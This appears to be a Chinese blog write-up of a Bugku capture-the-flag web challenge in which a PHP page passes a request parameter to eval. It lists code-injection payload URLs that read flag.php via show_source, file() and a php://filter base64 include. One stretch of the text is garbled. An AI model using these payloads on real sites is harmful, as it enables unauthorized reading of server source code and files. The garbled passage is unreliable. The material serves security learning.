本地包含

最新推荐文章于 2019-10-07 10:33:00 发布
最新推荐文章于 2019-10-07 10:33:00 发布
阅读量140 收藏
点赞数
分类专栏: bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44598397/article/details/101426448
版权

方法一:eval存在命令执行漏洞,使用hello构造payload
http://120.24.86.145:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(
方法二:
http://120.24.86.145:8003/index.php?hello=1);include P O S T [ ′ f ′ ] ; / / 在 P O S T 区 域 : f = p h p : / / f i l t e r / c o n v e r t . b a s e 64 − e n c o d e / r e s o u r c e = f l a g . p h p B a s e 64 再 解 码 即 可 。 方 法 三 : 直 接 将 f l a g . p h p 文 件 读 入 变 量 h e l l o 中 ? h e l l o = g e t f i l e c o n t e n t s ( ′ f l a g . p h p ′ ) ? h e l l o = f i l e ( ′ f l a g . p h p ′ ) 详 解 : 搜 了 一 下 @ _POST['f'];// 在POST区域:f=php://filter/convert.base64-encode/resource=flag.php Base64再解码即可。 方法三:直接将flag.php文件读入变量hello中 ?hello=get_file_contents('flag.php') ?hello=file('flag.php') 详解: 搜了一下@ POST[f];//POSTf=php://filter/convert.base64encode/resource=flag.phpBase64flag.phphello?hello=getfilecontents(flag.php)?hello=file(flag.php)@_REQUEST 的意思是获得参数,不论是@ G E T 还 是 @ _GET还是@ GET@_POST可以得到的参数@$_REQUEST都能得到。
所以构造hello的get参数。
$a应该最后会像字符串替换一样替换成hello的参数值吧。
eval() 函数存在命令执行漏洞,构造出文件包含会把字符串参数当做代码来执行。
file() 函数把整个文件读入一个数组中,并将文件作为一个数组返回。
print_r() 函数只用于输出数组。
var_dump() 函数可以输出任何内容:输出变量的容,类型或字符串的内容,类型,长度。
hello=file(“flag.php”),最终会得到var_dump(file(“flag.php”)),以数组形式输出文件内容。
include()函数和php://input,php://filter结合很好用,php://filter可以用与读取文件源代码,结果是源代码base64编码后的结果。
php://filter/convert.base64-encode/resource=文件路径(如index.php)

在这里插入图片描述

林夕林@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
本地安装wp
amaiCSDN的博客
04-16 276
1.LAMP环境 L:ubuntu A:sudo apt-get install apache2 M: sudo apt-get install mysql-server P: sudo apt-get install php7.0 版本下载最新的即可 可能需要Apache-php 工具链 sudo apt-get install libapache2-mod-php 2. 下载p...
本地包含 writeup
weixin_43400535的博客
02-06 239
9.本地包含 查看源码 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 知识点 1.$_REQUEST: 可以获取以POST方法和GET方法提交的数据,但是速度比较慢 2.eval: 把字...
Bugku—web—本地包含(wp)
我还在的博客
10-29 2114
0x00 前言 这是Bugku中web中的一道名为本地包含的题目。考察对PHP的知识。 0x01 解题过程 打开链接,你会看到一段PHP代码。 分析这段代码,最终得到攻击思路:通过构造名字为hello的攻击命令,把flag.php里面的代码以数组形式输出出来。 回车,则会看到flag ...
渗透测试技术之本地文件包含
02-01
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
MT4本地跟单系统,包含源码
11-04
1. **交易信号**:系统通过解析交易员的买卖操作生成交易信号,这些信号包括货币对、开仓方向、交易量、止损和止盈价格等。 2. **数据传输**:源码中可能包含了使用Websocket、RESTful API或其他通信协议将交易信号...
ExoPlayer播放本地视频
03-30
总的来说,ExoPlayer提供了一个强大且灵活的框架来处理各种媒体播放任务,包括本地视频播放。通过理解上述概念和技术点,开发者可以轻松地在Android应用中集成ExoPlayer,实现高效、流畅的视频播放体验。
本地包含和远程包含
weixin_34072857的博客
07-14 403
远程包含产生的原因:     php配置上:allow_url_fopen被激活(默认是激活的) 包含函数:include(),require(),include_once(),require_once() include() && require()语句:包括并运行指定文件   这两种结构除了在如何处理失败之外完全一样。include() 产生一个警告而 requ...
bugku 本地包含 writeup
热门推荐
xuchen16的博客
09-17 3万+
转载自:https://blog.csdn.net/Sanky0u/article/details/77197523 本地包含 右键查看代码   搜了一下@$_REQUEST 的意思是获得参数,不论是@$_GET还是@$_POST可以得到的参数@$_REQUEST都能得到。  所以构造hello的get参数。  $a应该最后会像字符串替换一样替换成hello的参数值吧。 &lt;1&gt...
浅谈本地文件包含利用
weixin_34179762的博客
08-14 779
今天在公众号看到了一个本地文件包含的利用工具,看了下国外大牛对该工具的使用的一个视频,感觉很厉害,通过该工具可对存在本地文件包含漏洞的站点进行利用并返回一个LFI shell,通过返回的LFI shell再次获取一个反向连接,从而可执行相关命令,以前对本地文件包含的利用大多都停留在读取文件,如果有远程文件包含的话就可以getshell。这篇文章主要是对本地文件包含的一个简单介...
PHP文件包含漏洞总结
坚持硬核
10-07 3276
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
本地文件包含漏洞详解
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含在 php 中,涉及到的危险函数有四个,分别是 inclu...
python3 导入本地 package 问题
learning notes
11-27 2377
经常遇到导包的魔幻问题,同一段代码,放在 pycharm 里面可能会正常运行,然后在终端中或者在 Jupyter notebook里面运行的时候,又会报错:ImportError:No module named XXX参考问题描述Relative imports in Python 3. 具体的解决办法是: 使用绝对导入的方法 在导入local package, 加一个 空的__init__.py
大学物理-章节PPT!
最新发布
07-22
大学物理-章节PPT!
将当前路径下的doc或者docx转化为doc/docx
07-22
将该脚本放在要转化doc/docx的路径下,执行
量子位:2023 AIGC算力全景与趋势报告(1).pdf
07-22
量子位:2023 AIGC算力全景与趋势报告(1).pdf
C# 实现DevExpress控件本地化教程
1. 引入必要的命名空间:在代码中,你需要导入如`DevExpress.XtraGrid.Localization`、`DevExpress.XtraBars.Localization`等DevExpress相关的本地化命名空间,这些命名空间包含了用于本地化的类和方法。 2. 创建...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值